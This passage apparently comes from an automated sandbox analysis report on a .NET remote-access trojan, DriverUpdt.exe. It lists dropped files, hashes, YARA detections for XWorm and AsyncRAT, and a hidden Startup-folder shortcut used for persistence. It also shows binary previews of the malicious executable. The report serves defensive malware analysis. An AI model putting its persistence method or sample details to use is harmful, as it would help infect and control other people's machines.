                          SHA-256:5209D5563A272C96AA4580DDCCC38581D30AC2203D1EB85DBAFEAF1A250DC8E7
                          SHA-512:42915A9B8F43EC1EB51D58EB7E313728ACBF5A84CAA416397ADFBC73E5345345C761881950CD8C176A9480C0A616E9BB4ABF702FD11F2F110BBF5D9469DDF396
                          Malicious:false
                          Preview:v.'.... ...............X\...;...{......................0.z..........{..3"...|y.h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{.....................................3"...|..................}...3"...|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                          Download File
                          Process:C:\Windows\System32\svchost.exe
                          File Type:OpenPGP Secret Key
                          Category:dropped
                          Size (bytes):16384
                          Entropy (8bit):0.08124453285313288
                          Encrypted:false
                          SSDEEP:3:XXEYehoiZ4wulekGuAJkhvekl19CllYllrekGltll/SPj:XXEzhoztrxlLmeJe3l
                          MD5:29454DA74EDCF276550237745DAF0477
                          SHA1:A3DA122C6DD000BE16A309F6952C6A6292F99FF7
                          SHA-256:4C174535E64691CBF8F73DC8BBDF952FA9C4215512CF5B18F318AFE95D4935E1
                          SHA-512:CBC54BFDA1506E46A14214EE1ADE8EF30CD67C5D0BEA8C1450FDD2D3147B90C4DB768FB2BA72F35CB96E962C8F3BDE7D1524D5580DDC827FB4D1F858AB4BF0A9
                          Malicious:false
                          Preview:.{!i.....................................;...{..3"...|.......{...............{.......{...XL......{..................}...3"...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DriverUpdt.log

                          Download File
                          Process:C:\Users\user\AppData\Roaming\DriverUpdt
                          File Type:CSV text
                          Category:dropped
                          Size (bytes):654
                          Entropy (8bit):5.380476433908377
                          Encrypted:false
                          SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                          MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                          SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                          SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                          SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                          Malicious:false
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:modified
                          Size (bytes):64
                          Entropy (8bit):0.34726597513537405
                          Encrypted:false
                          SSDEEP:3:Nlll:Nll
                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                          Malicious:false
                          Preview:@...e...........................................................

                          C:\Users\user\AppData\Local\Temp\Log.tmp

                          Download File
                          Process:C:\Users\user\Desktop\DriverUpdt.exe
                          File Type:Generic INItialization configuration [WIN]
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):3.6722687970803873
                          Encrypted:false
                          SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
                          MD5:DE63D53293EBACE29F3F54832D739D40
                          SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
                          SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
                          SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
                          Malicious:false
                          Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02jsdgny.q2t.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_12zc25uq.q0f.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1vnoaoms.u4z.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jl1nfem.5qp.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_emyiijh0.i5e.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ikfhwfho.3vz.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iqud4z3t.4pq.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jh2xp0ln.q4v.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lszxbovc.ozj.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjisagsy.crl.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sl32vdvz.p3a.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t4c410in.jwt.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzsdp5rh.00h.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3f3g5r3.poz.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vknoxv4m.pv1.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yzycsrnx.ae2.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Roaming\DriverUpdt

                          Download File
                          Process:C:\Users\user\Desktop\DriverUpdt.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):86528
                          Entropy (8bit):5.924066251460331
                          Encrypted:false
                          SSDEEP:1536:hZN9jYzwjg6XJlg1cpGxCgN6Fg94b6lFsmqsb7FHxQ6w3k08Bn6ZKsGOPVtrhID:hDJFjP3gOKLN6Frb6lEcRx30MlOPVFGD
                          MD5:65485B0475B6C8A3B4F35BBA541938A6
                          SHA1:28E6E6CD2EBF8A9FDFFEB4AEBA13B70EA7EA03A3
                          SHA-256:C6740EE5C8AFDC2C7BE42FB03AB5A346925EFC6AC785FE7D68DEC2D5F05D276B
                          SHA-512:034303EE48132B80DA79E54A6077676CFD436EF869493A11A27C29DC7CB730FD2CE902320D554A0CDE81FC0A06F6C56EFA5C170A1360906EC9FA7FD101C3706D
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\DriverUpdt, Author: Joe Security
                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\DriverUpdt, Author: Joe Security
                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\DriverUpdt, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 84%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Rwf.................H..........^g... ........@.. ....................................@..................................g..O.................................................................................... ............... ..H............text...dG... ...H.................. ..`.rsrc................J..............@..@.reloc...............P..............@..B................@g......H........d..........&.....................................................(....*.r...p*. ..d.*..(....*.rG..p*. .b..*.s.........s.........s.........s.........*.r...p*. .l..*.rU..p*. ....*.r...p*. 3wx.*.rc..p*. ....*.r...p*. z.6.*..((...*.r...p*. j...*.r...p*. .q..*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*. "Y..*.r5..p*. ...*.r...p*. ..e.*.r...p*. .O..*.r...p*. S...*.rQ..p*. .t..*.r..

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DriverUpdt.lnk

                          Download File
                          Process:C:\Users\user\Desktop\DriverUpdt.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Jul 1 21:34:39 2024, mtime=Mon Jul 1 21:34:39 2024, atime=Mon Jul 1 21:34:39 2024, length=86528, window=hide
                          Category:dropped
                          Size (bytes):758
                          Entropy (8bit):5.027512260081178
                          Encrypted:false
                          SSDEEP:12:8t64f3xy88Cv7lsY//3kJLaTrGKA/zjAshcFHpRCqLGAnmV:81fBp8Q7Z8FcB0AshclC8GAnm
                          MD5:B28360C3527ACFAE4AFAF4F032A823C1
                          SHA1:ACADBD3FD5486B0877514B229D0A6E50BE97D46B
                          SHA-256:35149B831F74E6ACC19D3F820A24D65364AED40C0A260E04EA80DF0A3DCAD264
                          SHA-512:37E4B04D1CD6E649A07F293312872158FE4DDE3A97C69A16B90396D5E226CA536A4EA2D300712EC96D6224A58BF4774A84B74C94F39C77FACA0627321AE2CC06
                          Malicious:false
                          Preview:L..................F.... ...a.K.....a.K.....a.K......R......................r.:..DG..Yr?.D..U..k0.&...&...... M......._.......`.........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.X4.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......X2...Roaming.@......DWSl.X2.....C........................R.o.a.m.i.n.g.....^.2..R...XT. .DRIVER~1..F.......XT..XT...../......................}..D.r.i.v.e.r.U.p.d.t.......Y...............-.......X............Fca.....C:\Users\user\AppData\Roaming\DriverUpdt........\.....\.....\.....\.....\.D.r.i.v.e.r.U.p.d.t.`.......X.......980108...........hT..CrF.f4... .z.V..7...,...W..hT..CrF.f4... .z.V..7...,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                          Download File
                          Process:C:\Windows\System32\svchost.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):55
                          Entropy (8bit):4.306461250274409
                          Encrypted:false
                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                          Malicious:false
                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):5.924066251460331
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                          • Win32 Executable (generic) a (10002005/4) 49.75%
                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                          • Windows Screen Saver (13104/52) 0.07%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          File name:DriverUpdt.exe
                          File size:86'528 bytes
                          MD5:65485b0475b6c8a3b4f35bba541938a6
                          SHA1:28e6e6cd2ebf8a9fdffeb4aeba13b70ea7ea03a3
                          SHA256:c6740ee5c8afdc2c7be42fb03ab5a346925efc6ac785fe7d68dec2d5f05d276b
                          SHA512:034303ee48132b80da79e54a6077676cfd436ef869493a11a27c29dc7cb730fd2ce902320d554a0cde81fc0a06f6c56efa5c170a1360906ec9fa7fd101c3706d
                          SSDEEP:1536:hZN9jYzwjg6XJlg1cpGxCgN6Fg94b6lFsmqsb7FHxQ6w3k08Bn6ZKsGOPVtrhID:hDJFjP3gOKLN6Frb6lEcRx30MlOPVFGD
                          TLSH:8E836C283BEA4029F1FFAFB559F03553CA79F7236903965F24C1024A4B13A89CE516F9
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Rwf.................H..........^g... ........@.. ....................................@................................

                          File Icon

                          Icon Hash:00928e8e8686b000

                          Static PE Info

                          General

                          Entrypoint:0x41675e
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x6677528D [Sat Jun 22 22:39:09 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                          Entrypoint Preview

                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1670c0x4f.text
